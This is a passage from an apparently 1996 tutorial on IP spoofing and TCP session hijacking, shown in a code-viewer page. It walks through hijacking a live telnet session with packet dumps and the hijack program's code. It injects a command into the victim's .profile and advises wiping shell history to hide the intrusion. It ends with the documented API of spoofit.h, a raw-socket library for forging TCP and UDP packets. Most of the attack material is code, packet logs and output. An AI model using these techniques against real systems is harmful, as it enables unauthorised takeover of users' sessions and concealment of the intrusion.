📄 ip-spoof.txt
字号:
people ignore this and re-login after a few secs, accepting the accident as Murphy's law. (Well it *can* happen without any spoofing involved)TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant)TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant)TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant)TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant)7) We are back on track (or at least hijack is, because this is going very fast). And we fire off our faked bash command. echo "echo HACKED" >> $HOME/.profile<ENTER>TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223F5 ACK (hex): C34A680B FLAGS: -AP--- Window: 7C00Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23 45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B . 50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20 22 " 65 e 63 c 68 h 6F o 20 48 H 41 A 43 C 4B K 45 E 44 D 22 " 20 3E > 3E > 24 $ 48 H 4F O 4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 .8) now we wait for this data to be confirmed. ACK = 5C8223F5 + 025 (=37 bytes)TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C82241A FLAGS: -AP--- Window: 2238Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040 (data removed because irrelevant)9) The connection runs on. Now you can execute more commands (just stay on track of SEQ/ACK), and even finnish the connection (with the same mechanism of sniper, or with sniper itself... here FIN is recommended). NOTE: here it is important to be in a shell. But if you have been watching someone, and you notice he's always directly going to 'pine' and you can't get inbetween on time. NO PROBS.... just make a cleanup string that cleans up 'pine' and puts you back in the shell. (some control chars, hotkeys, whatever....) NOTE: if you clean up the .sh_history of .bash_history (whatever) this attack is one of the nicest there is. Another advantage above sniffing. NOTE: Noone says you have to make a .rhosts file (rlogin and family might be disabled), you can change permissions, put stuff SUID, put it public, install stuff, mail, etc.. Discussion of the program (numbers correspond with those of 'An Actual Attack'):1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); Waiting for actual data (PSH is always used for packets containing data in interactive services like TELNET)2) N/A3) N/A4) sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER, 23,sp_seq,sp_ack,ACK|PSH); We recalculate the sequence number (using SEQ and datalength of packet 1) an we send a spoofed packet with ACK and PSH flag, containing the cleanup data in to_data.5) while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; We wait for a confirmation that our spoofed sequence is accepted. We expect a packet with an ACK set (PSH or not). It should come within 5 packets, we use this limit, because we should be able to handle some previous ACK packets! NOTE we don't check SEQ nrs, because we have no clue of what they are going to be (data might have been send our way, or not).6) while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; To get back on track, we try to receive 2 ACK packets without data with the same SEQ/ACK. We know enough packets will be send as a response to incorrect packets from the confused host A. This is how we get back on track. NOTE In a case where A completely gave up, simple spoof a packet with incorrect SEQ/ACK to get the correct numbers back.7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); Pretty clear....8) while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; and again waiting for confirmation. NOTE after the above attack, hijack had produced the following output: Starting Hijacking demo - Brecht Claerhout 1996 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: C34A680B (hex) ACK: 5C8223F5 (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 ended. 4.5 Other---------This list is far from complete, I'm sure you can think of other nice things to do with this information, think, experiment and code!5. The source code---------------------=[ spoofit.h ]=------------------------------------------------------------/**************************************************************************//* Spoofit.h - Include file for easy creating of spoofed TCP packets *//* Requires LINUX 1.3.x (or later) Kernel *//* (illustration for 'A short overview of IP spoofing') *//* V.1 - Copyright 1996 - Brecht Claerhout *//* *//* Purpose - Providing skilled people with a easy to use spoofing source *//* I used it to be able to write my tools fast and short. *//* Mind you this is only illustrative and can be easily *//* optimised. */ /* *//* Author - Brecht Claerhout <Coder@reptile.rug.ac.be> *//* Serious advice, comments, statements, greets, always welcome *//* flames, moronic 3l33t >/dev/null *//* *//* Disclaimer - This file is for educational purposes only. I am in *//* NO way responsible for what you do with this file, *//* or any damage you or this file causes. *//* *//* For whom - People with a little knowledge of TCP/IP, C source code *//* and general UNIX. Otherwise, please keep your hands of, *//* and catch up on those things first. *//* *//* Limited to - Linux 1.3.X or higher. *//* If you know a little about your OS, shouldn't be to hard *//* to port. *//* */ /* Important note - You might have noticed I use non standard packet *//* header struct's. How come?? Because I started like *//* that on Sniffit because I wanted to do the *//* bittransforms myself. *//* Well I got so damned used to them, I keep using them, *//* they are not very different, and not hard to use, so *//* you'll easily use my struct's without any problem, *//* this code and the examples show how to use them. */ /* my apologies for this inconvenience. *//* *//* None of this code can be used in commercial software. You are free to *//* use it in any other non-commercial software (modified or not) as long *//* as you give me the credits for it. You can spread this include file, *//* but keep it unmodified. *//* *//**************************************************************************//* *//* Easiest way to understand this library is to look at the use of it, in *//* the example progs. *//* *//**** Sending packets *****************************************************//* */ /* int open_sending (void) */ /* Returns a filedescriptor to the sending socket. *//* close it with close (int filedesc) *//* */ /* void transmit_TCP (int sp_fd, char *sp_data, *//* int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, *//* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest,unsigned short sp_dest_port, */ /* unsigned long sp_seq, unsigned long sp_ack, */ /* unsigned short sp_flags) */ /* fire data away in a TCP packet *//* sp_fd : raw socket filedesc. */ /* sp_data : IP options (you should do the padding) *//* TCP options (you should do the padding) *//* data to be transmitted *//* (NULL is nothing) *//* note that all is optional, and IP en TCP options are*//* not often used. *//* All data is put after eachother in one buffer. *//* sp_ipoptlen : length of IP options (in bytes) *//* sp_tcpoptlen : length of TCP options (in bytes) *//* sp_datalen : amount of data to be transmitted (bytes) *//* sp_source : spoofed host that"sends packet" *//* sp_source_port: spoofed port that "sends packet" *//* sp_dest : host that should receive packet *//* sp_dest_port : port that should receive packet *//* sp_seq : sequence number of packet *//* sp_ack : ACK of packet *//* sp_flags : flags of packet (URG,ACK,PSH,RST,SYN,FIN) *//* *//* void transmit_UDP (int sp_fd, char *sp_data, *//* int sp_ipoptlen, int sp_datalen, *//* char *sp_source, unsigned short sp_source_port, *//* char *sp_dest, unsigned short sp_dest_port) *//* fire data away in an UDP packet *//* sp_fd : raw socket filedesc. */ /* sp_data : IP options *//* data to be transmitted *//* (NULL if none) *//* sp_ipoptlen : length of IP options (in bytes) *//* sp_datalen : amount of data to be transmitted */ /* sp_source : spoofed host that"sends packet" *//* sp_source_port: spoofed port that "sends packet" *//* sp_dest : host that should receive packet *//* sp_dest_port : port that should receive packet *//* *//**** Receiving packets ***************************************************//* *//* int open_receiving (char *rc_device, char mode) *//* Returns fdesc to a receiving socket *//* (if mode: IO_HANDLE don't call this twice, global var *//* rc_fd_abc123 is initialised) *//* rc_device: the device to use e.g. "eth0", "ppp0" *//* be sure to change DEV_PREFIX accordingly! *//* DEV_PREFIX is the length in bytes of the header that *//* comes with a SOCKET_PACKET due to the network device *//* mode: 0: normal mode, blocking, (read will wait till packet */ /* comes, mind you, we are in PROMISC mode) *//* IO_NONBLOCK: non-blocking mode (read will not wait till *//* usefull for active polling) *//* IO_HANDLE installs the signal handler that updates SEQ,ACK,..*//* (IO_HANDLE is not recommended to use, as it should be *//* modified according to own use, and it works bad on heavy *//* traffic continuous monitoring. I needed it once, but left it *//* in to make you able to have a look at Signal handled IO, *//* personally I would have removed it, but some thought it *//* doesn't do any harm anyway, so why remove... ) */ /* (I'm not giving any more info on IO_HANDLE as it is not *//* needed for the example programs, and interested people can *//* easilythey figure the code out theirselves.) *//* (Besides IO_HANDLE can only be called ONCE in a program, *//* other modes multiple times) */ /* *//* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start, *//* unsigned char *proto) *//* This waits for a packet (mode default) and puts it in buffer or *//* returns whether there is a pack or not (IO_NONBLOCK). *//* It returns the packet length if there is one available, else 0 *//* *//* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, *//* char *wp_source, unsigned short wp_source_port, *//* char *wp_dest, unsigned short wp_dest_port, *//* int wp_flags, int wait_time); *//* wp_fd: a receiving socket (default or IO_NONBLOCK) *//* ret_values: pointer to a sp_wait_packet struct, that contains SEQ, *//* ACK, flags, datalen of that packet. For further packet *//* handling see the examples. *//* struct sp_wait_packet { *//* unsigned long seq,ack; *//* unsigned short flags; *//* int datalen; *//* }; *//* wp_source, wp_source_port : sender of packet *//* wp_dest, wp_dest_port : receiver of packet *//* wp_flags: flags that should be present in packet.. (mind you there *//* could be more present, so check on return) *//* note: if you don't care about flag, use 0 *//* wait_time: if not zero, this function will return -1 if no correct *//* packet has arrived within wait_time secs. *//* (only works on IO_NONBLOCK socket) *//* *//* void set_filter (char *f_source, unsigned short f_source_port, *//* char *f_dest, unsigned short f_dest_port) *//* (for use with IO_HANDLE) *//* Start the program to watch all trafic from source/port to */⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -